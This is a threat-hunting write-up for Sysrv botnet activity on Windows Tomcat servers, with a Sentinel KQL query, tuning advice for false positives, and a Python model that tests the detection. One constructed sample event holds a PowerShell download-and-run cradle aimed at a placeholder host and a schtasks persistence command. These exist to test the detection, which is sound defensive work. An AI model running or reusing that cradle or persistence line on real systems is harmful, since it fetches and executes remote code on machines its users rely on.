Hypothesis: the detection surfaces Sysrv botnet post-exploitation activity on Windows servers, in which an exploited Apache Tomcat process spawns cmd.exe or powershell.exe with an encoded (-enc) command, which in turn launches follow-on tooling (further shells, sc.exe, schtasks.exe, WMIC.exe) to set up persistence and fetch the miner. SOC teams should proactively hunt for this process chain in Azure Sentinel so that Sysrv infections are caught before the miner is deployed and server resources are stolen for cryptocurrency mining.
KQL Query

```kusto
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith 'tomcat'
| where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
    and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')
```
```yaml
id: eb5c922d-37f2-4790-9fa2-efd113c0f6d9
name: tomcat-8-executing-powershell
description: |
  This query was originally published in the threat analytics report, Sysrv botnet evolution.
  Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
  The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where InitiatingProcessParentFileName startswith 'tomcat'
  | where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
      and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Populated by the MicrosoftThreatProtection (Microsoft 365 Defender) connector; ensure it is enabled |
Known false positives

The filters below are written in a generic field syntax (process.parent_process_name, process.command_line, process.user); in Sentinel they map to the DeviceProcessEvents columns InitiatingProcessParentFileName, ProcessCommandLine and AccountName. Because the query only fires when the chain starts under a tomcat* parent and the initiating shell uses an encoded command, most of these scenarios will not match unless the tooling itself is launched from Tomcat with -enc. Add an exclusion only after confirming that is what the hit shows, and prefer matching on the decoded command content over wildcard substrings that an attacker can cheaply mimic.

Scenario: Scheduled PowerShell Task for System Maintenance
Description: A legitimate scheduled task runs PowerShell to perform system maintenance, such as disk cleanup or log rotation. A task started by the Task Scheduler is not launched under a tomcat* parent, so it does not match the base query as written; this exclusion is only relevant if the task is invoked from Tomcat itself.
Filter/Exclusion: process.parent_process_name:"Task Scheduler" or process.command_line:*Cleanup* or process.command_line:*Logrotate*

Scenario: Admin Using PowerShell for Configuration Management
Description: An administrator uses PowerShell to configure Tomcat settings, such as updating server.xml or deploying a WAR file. Caution: a user-based exclusion is unsafe for this detection. Everything the exploited Tomcat process spawns runs as the Tomcat service account, so if that account matches *admin* the malicious chain is excluded along with the administrator's. Scope any exclusion to the specific command line instead.
Filter/Exclusion: process.command_line:*server.xml* or process.command_line:*deploy* or process.user:*admin*

Scenario: PowerShell Script for Monitoring and Logging
Description: A monitoring tool such as PRTG or Nagios uses PowerShell scripts to collect metrics from Tomcat.
Filter/Exclusion: process.command_line:*PRTG* or process.command_line:*Nagios* or process.command_line:*Collect-Stats*

Scenario: PowerShell-Based Backup Job
Description: A backup job using Veeam or Commvault runs PowerShell scripts to back up Tomcat configuration files.
Filter/Exclusion: process.command_line:*Veeam* or process.command_line:*Commvault* or process.command_line:*Backup-Tomcat*

Scenario: PowerShell Module for Application Deployment
Description: A deployment tool such as Octopus Deploy or Chef uses PowerShell modules to deploy applications to Tomcat.
Filter/Exclusion: process.command_line:*Octopus* or process.command_line:*Chef* or process.command_line:*Deploy-Application*
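The following is an added example, not code from the original query or from the Sysrv threat analytics report. It is an offline Python model of the hunt (the query above) together with the tuning suggested by the false-positive scenarios: the query's predicates are re-implemented over constructed DeviceProcessEvents-style records so that exclusion logic can be unit-tested before the Sentinel rule is changed, and the -enc payload of each hit is decoded (PowerShell encodes it as base64 of UTF-16LE, not UTF-8). Kusto term matching (has_any, hasprefix) is approximated with case-insensitive substring matching, which is slightly broader. The benign command-line markers, hostnames and the URL in the samples are placeholders chosen for this example; deliberately, no user-name exclusion is modelled.

```python
"""Offline model of the tomcat-8-executing-powershell hunt (added example)."""
import base64
import re
from typing import Optional

INITIATORS = {"cmd.exe", "powershell.exe"}
FOLLOW_ON = ("cmd.exe", "powershell.exe", "sc.exe", "schtasks.exe", "wmic.exe")

# Hypothetical benign markers translated from the false-positive scenarios.
# Command-line markers only: the Tomcat chain runs as the Tomcat service
# account, so a user-based exclusion would suppress the attacker as well.
BENIGN_CMDLINE_MARKERS = ("Backup-Tomcat", "Collect-Stats", "Deploy-Application")

# Matches -enc, -encodedcommand, -EncodedCommand followed by the base64 blob.
_ENC_RE = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -enc argument, or None if absent."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell base64-encodes the script as UTF-16LE; decoding as UTF-8
        # would leave a NUL between every character.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def matches_base_query(ev: dict) -> bool:
    """Mirror the four predicates of the KQL query (case-insensitive)."""
    parent = ev.get("InitiatingProcessParentFileName", "").lower()
    initiator = ev.get("InitiatingProcessFileName", "").lower()
    init_cmd = ev.get("InitiatingProcessCommandLine", "")
    child_cmd = ev.get("ProcessCommandLine", "").lower()
    return (
        parent.startswith("tomcat")
        and initiator in INITIATORS
        and _ENC_RE.search(init_cmd) is not None       # hasprefix '-enc'
        and any(tool in child_cmd for tool in FOLLOW_ON)  # has_any (...)
    )


def is_tuned_out(ev: dict) -> bool:
    """Exclusion for the documented benign scenarios (command line only)."""
    cmd = ev.get("ProcessCommandLine", "").lower()
    return any(marker.lower() in cmd for marker in BENIGN_CMDLINE_MARKERS)


def hunt(events):
    """Apply query and tuning; return (event, decoded payload) per hit."""
    return [
        (ev, decode_encoded_command(ev["InitiatingProcessCommandLine"]))
        for ev in events
        if matches_base_query(ev) and not is_tuned_out(ev)
    ]


def encode_for_powershell(script: str) -> str:
    """Build a -enc argument the way PowerShell expects it (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry; URL and hosts are placeholders.
SAMPLE_EVENTS = [
    {   # Sysrv-style chain: tomcat8.exe -> powershell.exe -enc -> schtasks.exe
        "DeviceName": "web01",
        "InitiatingProcessParentFileName": "tomcat8.exe",
        "InitiatingProcessFileName": "powershell.exe",
        "InitiatingProcessCommandLine": "powershell.exe -nop -w hidden -enc "
        + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ldr.ps1')"),
        "ProcessCommandLine": "schtasks.exe /create /tn update /tr C:\\Windows\\Temp\\a.exe /sc minute",
    },
    {   # Benign backup job launched from Tomcat with an encoded command
        "DeviceName": "web01",
        "InitiatingProcessParentFileName": "tomcat8.exe",
        "InitiatingProcessFileName": "powershell.exe",
        "InitiatingProcessCommandLine": "powershell.exe -enc "
        + encode_for_powershell("Backup-Tomcat -Path C:\\tomcat\\conf"),
        "ProcessCommandLine": "cmd.exe /c Backup-Tomcat.cmd",
    },
    {   # Scheduled task: parent is not tomcat*, so it never matches
        "DeviceName": "web02",
        "InitiatingProcessParentFileName": "svchost.exe",
        "InitiatingProcessFileName": "powershell.exe",
        "InitiatingProcessCommandLine": "powershell.exe -enc "
        + encode_for_powershell("Get-ChildItem C:\\logs"),
        "ProcessCommandLine": "cmd.exe /c del C:\\logs\\old.log",
    },
]

if __name__ == "__main__":
    for ev, decoded in hunt(SAMPLE_EVENTS):
        print(ev["DeviceName"], "|", ev["ProcessCommandLine"], "->", decoded)
```

Running the block prints only the first sample: the backup job matches the base query but is tuned out by its command-line marker, and the svchost-parented task never matches. The decoded payload is what an analyst should triage and, for confirmed benign tooling, what an exclusion should key on.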